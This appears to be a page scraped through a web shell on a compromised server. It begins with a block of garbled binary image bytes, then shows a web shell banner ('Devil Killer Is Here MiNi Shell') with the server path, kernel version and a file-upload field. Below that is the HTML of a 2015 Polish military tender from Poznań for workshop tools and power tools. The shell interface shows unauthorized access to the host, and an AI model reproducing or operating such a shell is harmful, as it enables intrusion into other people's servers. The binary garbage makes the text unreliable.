JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150818/122749-N-2015.html

<p class="kh_header"><b>Poznań: ZAKUP NARZĘDZI RĘCZNYCH, ELEKTRONARZĘDZI i URZĄDZEŃ WARSZTATOWYCH</b><br>
<b>Numer ogłoszenia: 122749 - 2015; data zamieszczenia: 18.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 14 Wojskowy Oddział Gospodarczy , ul. Bukowska 34, 60-811 Poznań, woj. wielkopolskie, tel. 61 857 48 02, faks 61 857 72 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.14wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP NARZĘDZI RĘCZNYCH, ELEKTRONARZĘDZI i URZĄDZEŃ WARSZTATOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup narzędzi ręcznych,  elektronarzędzi                  i urządzeń warsztatowych do zabezpieczenia potrzeb warsztatu remontowego GZ Poznań 14 Wojskowego Oddziału Gospodarczego, pododdziałów naprawczych Centrum Szkolenia Wojsk Lądowych, oraz zakup narzędzi                      i sprzętu transportowego na potrzeby służb uzbrojenia i elektroniki, transportu                    i ruchu wojsk i sekcji infrastruktury 14 WOG w ilościach i asortymencie wymienionym w załączniku nr 5 (5/1, 5/2, 5/3, 5/4, 5/5, 5/6, 5/7) do SIWZ tj. formularzach cenowych oraz zgodnych z wymaganiami eksploatacyjno - technicznymi dotyczącymi przedmiotu zamówienia zawartymi                                        w załączniku nr 6 do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.90.00.00-5, 44.51.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium  
1.	Zamawiający żąda wniesienia wadium na całość zamówienia w wysokości: 
a)	Zadanie nr 4-  3 300,00  zł
b)	Zadanie nr 7-  3 500,00  zł
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert, jednej lub kilku formach przewidzianych w art. 45 ust.6 ustawy.
2.	W przypadku wniesienia wadium w formie pieniężnej, należy je wnieść przelewem na konto 14 Wojskowego Oddziału Gospodarczego: nr 63 1010 1469 0042 0013 9120 1000.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał należycie dostawy ( minimum 1 dostawę dla danego zadania) odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia tj. dostawy narzędzi ręcznych, elektronarzędzi i urządzeń warsztatowych, których suma odpowiada wartości brutto podanych poniżej:
dla zadania nr 1 - 10 000,00 zł
dla zadania nr 2 - 15 000,00 zł
dla zadania nr 3 - 6 000,00 zł
dla zadania nr 4 - 140 000,00 zł
dla zadania nr 5 - 35 000,00 zł
dla zadania nr 6 - 15 000,00 zł
dla zadania nr 7 - 145 000,00 zł
W przypadku kiedy Wykonawca składa ofertę w postępowaniu na kilka zadań winień wykazać się doświadczeniem dla każdego zadania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wybrany wykonawca zobowiązany będzie do dostarczenia wraz z dostawą niżej wymienione dokumenty dla poszczególnych towarów zgodnie z opisem zawartym w wymaganiach eksploatacyjno - technicznych zawartych w załączniku nr 6 do SIWZ):
a)	Wykonawca zobowiązany jest dostarczyć do każdego przedmiotu zamówienia (jeżeli występuje) oryginalną dokumentację techniczną, instrukcję użytkowania oraz kopię certyfikatu zgodności lub deklarację zgodności. Dostarczone dokumenty muszą być w języku polskim;
b)	Wykonawca zobowiązany jest dostarczyć karty gwarancyjne:
na wyroby identyfikowalne (posiadające nr seryjne lub inne cechy identyfikowalności). Dostarczone karty gwarancyjne muszą zawierać informację o warunkach udzielonej gwarancji i o sposobie postępowania w przypadku konieczności uruchomienia procedury gwarancyjnej.
2.Oferta musi zawierać:
a)	formularz oferty, stanowiący załącznik nr 1 do SIWZ,
b)	formularz cenowy, stanowiący załącznik nr 5  (5/1- zadanie 1; 5/2 - zadanie 2; 5/3 - zadanie 3, 5/4 - zadanie 4, 5/5 - zadania 5, 5/6 - zadanie 6, 5/7 - zadanie 7) do SIWZ,

c)	informację w sprawie przynależności do grupy kapitałowej według załącznika nr 4 do SIWZ. 
d)	pełnomocnictwo w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin dostawy - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć                      w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.  W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.14wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 14 Wojskowy Oddział Gospodarczy , ul. Bukowska34, 60-811 Poznań , Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2015 godzina 10:00, miejsce: 14 Wojskowy Oddział Gospodarczy , ul. Bukowska34, 60-811 Poznań, kancelaria jawna , bud nr 2 pokój nr 17 A od pon-pt w godz. od 7.30-15.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podnośnik hydrauliczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PODNOŚNIK HUDRAULICZNY DWUKOLUMNOWY 3,6 T.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.41.32.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Montażownica do opon.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Montażownica do opon pojazdów osobowych i dostawczych 
­	przeznaczona do zastosowań profesjonalnych (w warunkach ciągłych prac warsztatowych) Montażownica przeznaczona do montażu i demontażu opon samochodów osobowych i dostawczych w tym opon niskoprofilowych i opon typu run-flat;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.90.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Myjka ultradźwiękowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Myjka ultradźwiękowa 
­	przeznaczona do zastosowań profesjonalnych (w warunkach ciągłych prac warsztatowych);
­	napięcie zasilania 					230 V
­	maksymalna moc generatora 			min 600 W
­	maksymalna moc grzałki 				950- 1050 W
­	pojemność komory myjącej			maksymalnie ok. 26 l 
­	pojemność komory myjącej 			średnio (optymalnie) ok 22 l
­	wymiary wewnętrzne wanny roboczej 		ok 500 x 300 x 200 mm
­	wymiary zewnętrzne				ok 575 x 560 x 360.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.90.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Narzędzia ręczne i elektronarzędzia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYRZĄD DO SPRAWDZENIA WTRYSKIWACZY 
ZESTAW NARZĘDZIOWY MECHANIKA SAMOCHODOWEGO - WÓZEK NARZĘDZIOWY  
ZESTAW KLUCZY NASADOWYCH SZEŚCIOKĄTNYCH 1/4
ZESTAW KLUCZY NASADOWYCH SZEŚCIOKĄTNYCH 1/2
ZESTAW KLUCZY NASADOWYCH SZEŚCIOKĄTNYCH 3/4
LAMPA WARSZATOWA LED 
LUPA WARSZTATOWA Z OŚWIETLENIEM 
PODNOŚNIK PNEUMATYCZNY PODUSZKOWY 8 T
ZESTAW WKRĘTAKÓW DO POBIJANIA 
ZESTAW WKRĘTAKÓW Z ZABIERAKIEM
ZESTAW WKRETAKÓW PRECYZYJNYCH 
ZESTAW KLUCZY KĄTOWYCH Z KULKĄ 6-KĄTNYCH
NITOWNICA RĘCZNA 2,4 - 4,8 MM
ZESTAW KLUCZY OCZKOWO - PŁASKICH Z GRZECHOTKĄ 
ZESTAW KLUCZY OCZKOWYCH PÓŁOTWARTYCH DWUSTRONNYCH 
WKRĘTAK UDAROWY 
ZESTAW SZCZYPIEC DO OPASEK 
ZESTAW NASADEK UDAROWYCH 1/2
LEŻANKA - TABORET WARSZTATOWA
KLUCZ PNEUMATYCZNY 1/2
KLUCZ PNEUMATYCZNY 3/4
ZAKRĘTAK KĄTOWY 1/2
PRZEWÓD CIŚNIENIOWY NA BĘBNIE 20 - 30 M
PISTOLET DO MALOWANIA ZBIORNIK GÓRNY 0.5 L
PISTOLET WYDMUCHOWY 210 MM 
PISTOLET WYDMUCHOWY Z ZAGIĘTA LANCĄ Metabo   BP-200 lub równoważny
LUTOWNICA GAZOWA 
PISTOLET DO POMPOWANIA OPON MIN. 10 BAR
ZSZYWACZ TAPICERSKI 
SZLIFIERKA PNEUMATYCZNA TRZPIENIOWA WYSOKOOBROTOWA
SZLIFIERKA PNEUMATYCZNA TRZPIENIOWA WOLNOOBROTOWA
MIERNIK GRUBOŚCI LAKIERU ELEKTRONICZNY 
ELEKTRONICZNY WYKRYWACZ NIESZCZELNOŚCI KLIMATYZACJI
LAMPA WARSZTATOWA AKUMULATOROWA OBROTOWA Z UV
TERMOMETR ELEKTRONICZNY PODWÓJNY Z SONDĄ
GENERATOR OZONU - URZĄDZENIE DO ODGRZYBIANIA KLIMATYZACJI
FORMA BIEGUNA DODATNIEGO AKUMULATORA
FORMA BIEGUNA UJEMNEGO AKUMULATORA
TESTER AKUMULATORÓW ELEKTRONICZNY Z DRUKARKĄ
TESTER STĘŻENIA WODORU
PRZEWODY POMIAROWE DO MIERNIKÓW CYFROWYCH UT-L09 lub równoważny
ZESTAW WYCINAKÓW DO OTWORÓW 2,5 - 22 MM
PODPORA REGULOWANA POD SAMOCHODY OSOBOWE I DOSTAWCZE 5 T
PODPORA REGULOWANA POD SAMOCHODY CIĘŻAROWE 8 T
SZCZYPCE DO CIĘCIA KABLI IZOLOWANE 250 MM            1000 V
SZCZYPCE IZOLOWANE ODGIĘTE 200 MM 1000 V
SKRZYNKA NARZĘDZIOWA 2 SZUFLADOWA 
WALIZKA NARZĘDZIOWA Z TWORZYWA 
ZESTAW DO NAPRAWY GWINTÓW 
ZESTAW KOŃCÓWEK WPUSTOWYCH 
ZESTAW KOŃCÓWEK WKRĘTAKOWYCHTYPU BIT
TESTER DO AKUMULATORÓW 12V / 6V / 2V
MIERNIK CĘGOWY AC, AC/DC
MIERNIK REZYSTENCJI UZIEMIENIA 
PRZENOSNY MOSTEK RLC AX-LCR41A lub równoważny
PRZEDŁUŻACZ ELEKTRYCZNY BĘBNOWY 230 V
PRZEDŁUŻACZ ELEKTRYCZNY BĘBNOWY 400 V
LUTOWNICA TRANSFORMATOROWA 75/100W
WIERTARKO WKRĘTARKA Z AKCESORIAMI 
OPALARKA 
SZLIFIERKA KĄTOWA AKUMULATOROWA
MŁOTOWIERTARKA UDAROWA AKUMULATOROWA
WAGA ELEKTRONICZNA 60 KG
ODSYSACZ DO CYNY Z PODWÓJNYM TŁOKIEM I KOŃCÓWKAMI TEFLONOWYMI
ZESTAW MANOMETRÓW DO AZOTU Z WĘŻAMI I PRZYŁĄCZAMI DO KLIMATYZACJI TX 13.032 lub równoważny 
ZESTAW DO DEMONTAŻU SPRZĘGŁA SPRĘŻARKI KLIMATYZACJI TX91000-A lub równoważny
PRZEDŁUŻKA ZAWORÓW DO POJAZDÓW CIĘŻAROWYCH Z TWORZYWA 170 MM
ZESTAW NASADEK UDAROWYCH Z PALSTIKOWĄ OSŁONĄ DO OBRĘCZY ALUMINIOWYCH 17MM, 19MM,     21 MM
KLUCZ KRZYŻAKOWY DO KÓŁ 17 x 19 x 22 x 1/2
WĄŻ PNEUMATYCZNY SPIRALNY PU 12X8 MM, 5 M Z SZYBKOZŁĄCZAMI
WĄŻ PNEUMATYCZNY SPIRALNY PU 12X8 MM, 10 M Z SZYBKOZŁĄCZAMI
PISTOLET DO POMPOWANIA POWIETRZA 0-12 BAR,         1,8 M WĄŻ - Z LEGALIZACJĄ PNPCLAFG-1H081L lub równoważny
WĘŻYK 1,8 M DO PISTOLETU Z POZ. 60
CIŚNIENIOMIERZ CYFROWY Z LATARKĄ 0,5 - 9,99 BAR POŚWIETLANA SKALA, TRZY TRYBY ODCZYTU 
KLUCZ DO WKŁADEK ZAWOROWYCH KLIMATYZACJI TX 81290 lub równoważny
ZESTAW DO WYMIANY WKŁADEK ZAWOROWYCH KLIMATYZACJI BEZ ODZYSKIWANIA GAZU TX 13.053 lub równoważny
NASADKA OŚMIOKĄTNA DO DEMONTAŻU ZAWORKÓW LP
NASADKA OŚMIOKĄTNA DO DEMONTAŻU ZAWORKÓW HP
DWÓJNIK 3/8-1/2KPL Z SZYBKOZŁĄCZAMI
KRÓCIEC Z GWINTEM WEWNĘTRZNYM 1/2
KRÓCIEC Z GWINTEM ZEWNĘTRZNYM 1/2
KRÓCIEC Z GWINTEM WEWNĘTRZNYM 3/8
SZYBKOZŁĄCZKA Z GWINTEM WEWNĘTRZNYM 1/2
SZYBKOZŁĄCZKA Z GWINTEM ZEWNĘTRZNYM 1/2
SZYBKOZŁĄCZKA Z GWINTEM WEWNĘTRZNYM 3/8
SZYBKOZŁĄCZKA Z GWINTEM ZEWNĘTRZNYM 3/8
SZYBKOZŁĄCZKA Z GWINTEM ZEWNĘTRZNYM 1/4
POJEMNIK WARSZTATOWY Z MOŻLIWOŚCIĄ SZTAPLOWANIA 157X101X74 NIEBIESKI
ZESTAW WIERTEŁ DO METALU - 25 SZT. MAKITA            P-61391 lub równoważny
GWINTOWNIKI KRÓTKIE M 5
GWINTOWNIKI KRÓTKIE M 6
GWINTOWNIKI KRÓTKIE M 8
NARZYNKA OKRĄGŁA M 8
NARZYNKA OKRĄGŁA M 10
PĘDZEL OKRĄGŁY O 25 MM
PĘDZEL OKRĄGŁY O 35 MM
PĘDZEL OKRĄGŁY O 50 MM
PĘDZEL PŁASKI 25 MM
PĘDZEL PŁASKI 50 MM
PĘDZEL PŁASKI 63 MM
NOŻ MONTERSKI DO KABLI SKŁADANY 150 MM
REDUKCJA UDAROWA 3/4 -1/2
IMADŁO WARSZTATOWE ŚLUSARSKIE OBROTOWE 125
